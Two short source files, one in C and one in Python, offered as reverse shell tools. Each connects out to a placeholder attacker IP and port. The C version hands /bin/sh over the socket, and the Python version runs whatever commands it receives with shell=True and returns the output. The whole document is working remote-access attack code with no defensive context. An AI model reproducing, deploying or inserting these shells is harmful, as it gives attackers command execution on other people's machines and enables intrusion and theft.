File: reverseshell.c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <netinet/in.h>
#include <sys/socket.h>

int main() {
    int sockfd;
    struct sockaddr_in server;

    // Set your IP address and port number
    char* ip = "your_ip_address";
    int port = your_port_number;

    // Create socket
    sockfd = socket(AF_INET, SOCK_STREAM, 0);
    server.sin_family = AF_INET;
    server.sin_port = htons(port);
    server.sin_addr.s_addr = inet_addr(ip);

    // Connect to the remote host
    connect(sockfd, (struct sockaddr*)&server, sizeof(server));

    // Redirect input, output, and error streams to the socket
    dup2(sockfd, 0);
    dup2(sockfd, 1);
    dup2(sockfd, 2);

    // Execute the shell
    execve("/bin/sh", NULL, NULL);

    return 0;
}

File: reverseshell.py
import socket
import subprocess

def connect():
    # Set your IP address and port number
    ip = 'your_ip_address'
    port = your_port_number

    # Create socket
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

    try:
        # Connect to the remote host
        s.connect((ip, port))

        while True:
            # Receive the command from the server
            command = s.recv(1024).decode()

            if command.lower() == 'exit':
                break

            # Execute the command and retrieve the output
            output = subprocess.check_output(command, shell=True)

            # Send the output back to the server
            s.send(output)

    except Exception as e:
        print(f"Connection error: {e}")
        pass

    # Close the socket
    s.close()

if __name__ == '__main__':
    connect()

